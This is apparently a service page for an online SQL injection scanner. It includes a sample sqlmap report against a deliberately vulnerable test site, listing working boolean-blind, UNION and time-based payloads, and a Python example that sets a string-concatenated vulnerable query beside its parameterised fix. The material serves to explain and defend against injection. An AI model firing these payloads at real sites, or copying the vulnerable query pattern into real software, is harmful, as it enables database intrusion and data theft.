SQL Injection Test Help
Entering a web address into the form will have that URL tested for SQL Injection by one of our external servers. This type of vulnerability could allow backend database manipulation, access to customer data or even operating system access.
SQL Injection is a significant ongoing risk to organizations on the Internet, as recent news reports show.
HackerTarget.com Sample SQL Injection Report
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 09:04:35

[09:04:36] [INFO] using '/opt/sqlmap/output/testphp.vulnweb.com/session' as session file
[09:04:36] [INFO] testing connection to the target url
[09:04:37] [INFO] testing if the url is stable, wait a few seconds
[09:04:38] [INFO] url is stable
[09:04:38] [INFO] testing if GET parameter 'artist' is dynamic
[09:04:38] [INFO] confirming that GET parameter 'artist' is dynamic
[09:04:39] [INFO] GET parameter 'artist' is dynamic
[09:04:39] [INFO] heuristic test shows that GET parameter 'artist' might be injectable (possible DBMS: MySQL)
[09:04:39] [INFO] testing sql injection on GET parameter 'artist'
[09:04:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:04:40] [INFO] GET parameter 'artist' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:04:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:04:52] [INFO] GET parameter 'artist' is 'MySQL > 5.0.11 AND time-based blind' injectable
[09:04:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:04:55] [INFO] target url appears to be UNION injectable with 3 columns
[09:04:56] [INFO] GET parameter 'artist' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: artist
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=2 AND 683=683

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: artist=-743 UNION ALL SELECT NULL, CONCAT(CHAR(58,105,117,110,58),IFNULL(CAST(CHAR(67,106,71,66,118,97,119,68,106,119) AS CHAR),CHAR(32)),CHAR(58,100,107,122,58)), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: artist=2 AND SLEEP(5)
---

[09:05:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[09:05:16] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 09:05:16
Free webmail addresses such as Gmail accounts are restricted to reduce abuse of the system; a valid membership is required to use a free email address.
A URL with parameters at the end is the type of URI tested by this scan:
- www.example.com?id=2&page=2
This URL will have the parameters id and page tested for SQL injection.
The online SQL Injection scan tests for injectable parameters on a web URI; testing methods include blind and error-based SQL Injection.
Note that you must have permission to scan the site you nominate. Automated security scans can upset listening services, fill up log files and trigger IDS alerts.
Enter the URL to test and your email address; results are emailed immediately.
About SQL Injection
SQL Injection is a common attack vector in dynamic web applications. It allows an attacker to gain access to the database or database functions through poor coding practices. A good SQL injection reference is available on the OWASP site.
Recently a number of high-profile attacks have exploited SQL Injection, resulting in the loss of millions of customer records and hundreds of thousands of login/password combinations.
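To show what the "poor coding practices" above look like and why the boolean-based and UNION payloads in the sample report succeed, here is an added example (not HackerTarget's or sqlmap's code) that runs the same two payload shapes against a string-concatenated query and against its parameterised replacement. The SQLite table, its rows and the artist lookup are constructed to stand in for the PHP page in the report.

```python
# Added example: vulnerable concatenated query beside its parameterised fix.
# Table, rows and the "artist" parameter are constructed for illustration.
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER, name TEXT, country TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?, ?)",
                     [(1, "Alice", "UK"), (2, "Bob", "US"), (3, "Carol", "DE")])
    return conn


def lookup_vulnerable(conn, artist):
    # Whatever arrives in ?artist= becomes part of the SQL text itself,
    # so an appended condition or UNION is parsed and executed.
    sql = "SELECT artist_id, name, country FROM artists WHERE artist_id = " + artist
    return conn.execute(sql).fetchall()


def lookup_safe(conn, artist):
    # The value is bound as data; the database never parses it as SQL.
    sql = "SELECT artist_id, name, country FROM artists WHERE artist_id = ?"
    return conn.execute(sql, (artist,)).fetchall()


# Payload shapes taken from the sample report (boolean-based blind and UNION);
# the UNION selects a constant string instead of the report's CONCAT expression.
BOOLEAN_TRUE = "2 AND 683=683"
BOOLEAN_FALSE = "2 AND 683=684"
UNION = "-743 UNION ALL SELECT NULL, 'injected', NULL"


def demo():
    conn = setup_db()
    results = {
        "vuln_true": lookup_vulnerable(conn, BOOLEAN_TRUE),    # row 2 returned
        "vuln_false": lookup_vulnerable(conn, BOOLEAN_FALSE),  # empty: blind test
        "vuln_union": lookup_vulnerable(conn, UNION),          # injected row returned
        "safe_true": lookup_safe(conn, BOOLEAN_TRUE),          # empty: no id matches
        "safe_union": lookup_safe(conn, UNION),                # empty: no UNION runs
        "safe_normal": lookup_safe(conn, "2"),                 # ordinary lookup works
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The differing result sets for `BOOLEAN_TRUE` and `BOOLEAN_FALSE` on the vulnerable path are exactly the signal a boolean-based blind test looks for; on the parameterised path both return nothing, so the parameter is no longer injectable.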